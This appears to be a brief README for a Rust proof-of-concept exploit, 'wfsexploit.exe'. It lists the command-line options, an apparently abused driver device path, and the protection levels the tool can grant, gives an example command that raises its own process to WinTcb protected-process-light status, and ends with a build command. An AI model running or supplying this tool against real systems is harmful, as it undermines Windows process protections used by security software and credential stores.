This is a PoC writtn in Rust and allows you to use rich CLI features to make it what you like.
> wfsexploit.exe -h
Usage: wfsexploit.exe [OPTIONS]
Options:
-d, --device-name <DEVICE_NAME> [default: \\.\htsysm7F34]
-t, --prot-type <PROT_TYPE> [default: ps-protected-type-protected] [possible values: ps-protected-type-none, ps-protected-type-protected-light, ps-protected-type-protected, ps-protected-type-max]
-s, --prot-signer <PROT_SIGNER> [default: ps-protected-signer-win-tcb] [possible values: ps-protected-signer-none, ps-protected-signer-authenticode, ps-protected-signer-code-gen, ps-protected-signer-antimalware, ps-protected-signer-lsa, ps-protected-signer-windows, ps-protected-signer-win-tcb, ps-protected-signer-win-system, ps-protected-signer-app, ps-protected-signer-max]
-e, --exit-on-done
-h, --help Print help information
-V, --version Print version informationWith the auguments you can specify what types of protection to elevate by commandline.
For example, below command will elevate the PoC process into WinTcb PPL.
wfsexploit.exe -t="ps-protected-type-protected-light" -s="ps-protected-signer-win-tcb"cargo build --release